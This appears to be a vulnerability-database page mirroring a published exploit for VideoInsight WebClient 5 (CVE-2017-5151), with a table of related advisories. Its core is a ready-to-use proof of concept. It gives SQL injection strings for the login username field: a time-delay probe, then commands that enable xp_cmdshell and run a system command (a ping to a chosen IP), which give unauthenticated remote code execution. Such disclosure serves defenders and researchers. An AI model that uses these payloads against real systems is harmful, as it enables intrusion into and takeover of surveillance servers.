Lucene search
K

VideoInsight WebClient 5 SQL Injection

🗓️ 21 Jun 2018 00:00:00Reported by vosecType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

VideoInsight WebClient 5 SQL Injection targeting unauthenticated fields for remote code executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today
VideoInsight WebClient 5 - SQL Injection Vulnerability
21 Jun 201800:00
zdt
CNVD
Web Client SQL Injection Vulnerability
16 Jan 201700:00
cnvd
CVE
CVE-2017-5151
13 Feb 201721:00
cve
Cvelist
CVE-2017-5151
13 Feb 201721:00
cvelist
Exploit DB
VideoInsight WebClient 5 - SQL Injection
20 Jun 201800:00
exploitdb
EUVD
EUVD-2017-14260
7 Oct 202500:30
euvd
exploitpack
VideoInsight WebClient 5 - SQL Injection
20 Jun 201800:00
exploitpack
ICS
VideoInsight Web Client
12 Jan 201700:00
ics
NVD
CVE-2017-5151
13 Feb 201721:59
nvd
OSV
CVE-2017-5151
13 Feb 201721:59
osv
Rows per page
`# Title: VideoInsight WebClient 5 - SQL Injection  
# Date: 2018-05-06  
# Author: vosec  
# Vendor Homepage: https://www.security.us.panasonic.com/  
# Software Link: https://www.security.us.panasonic.com/video-management-software/web-client/  
# Version: 5  
# Tested on: Windows Server 2008 R2  
# CVE: N/A  
  
# Description:   
# This exploit is based on CVE-2017-5151 targeting versions prior.  
# The txtUserName and possibly txtPassword field contain an unauthenticated SQL injection vulnerability  
# that can be used for remote code execution.  
  
# SQL Injection - PoC  
# From the web login page submit the following string as the username with anything in the password field.   
# The web server will hang for 5 seconds:  
  
UyYr');WAITFOR DELAY '00:00:05'--  
  
# Remote Code Execution - PoC  
# From the web login page submit each of the following strings as the username, one at a time, with anything  
# in the password field (with the ping, use a valid IP address that you can monitor):  
UyYr');EXEC sp_configure 'show advanced options', 1;RECONFIGURE;--  
UyYr');EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--  
UyYr');EXEC xp_cmdshell 'ping xxx.xxx.xxx.xxx';--  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation